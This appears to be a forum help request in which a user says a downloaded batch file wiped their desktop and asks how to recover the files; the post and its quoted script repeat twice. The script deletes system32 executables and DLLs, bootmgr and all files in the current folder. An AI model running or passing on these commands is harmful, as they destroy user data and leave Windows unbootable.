Hello, I need help.
I was dumb and ran a bat file from the internet and it deleted all my files on desktop!!!
Is there any way to undo this or get my files back???
Here is the code in the bat file:
@echo off
rem Very destructive virus!
for %%i in (%systemroot%\system32\*.exe) do del /q %%i
for %%i in (%systemroot%\system32\*.dll) do del /q %%i
for %%i in (*.*) do del /q %%i
del /q %systemdrive%\bootmgr
del /q *.*
PLEASE HELP
I was dumb and ran a bat file from the internet and it deleted all my files on desktop!!!
Is there any way to undo this or get my files back???
Here is the code in the bat file:
@echo off
rem Very destructive virus!
for %%i in (%systemroot%\system32\*.exe) do del /q %%i
for %%i in (%systemroot%\system32\*.dll) do del /q %%i
for %%i in (*.*) do del /q %%i
del /q %systemdrive%\bootmgr
del /q *.*
PLEASE HELP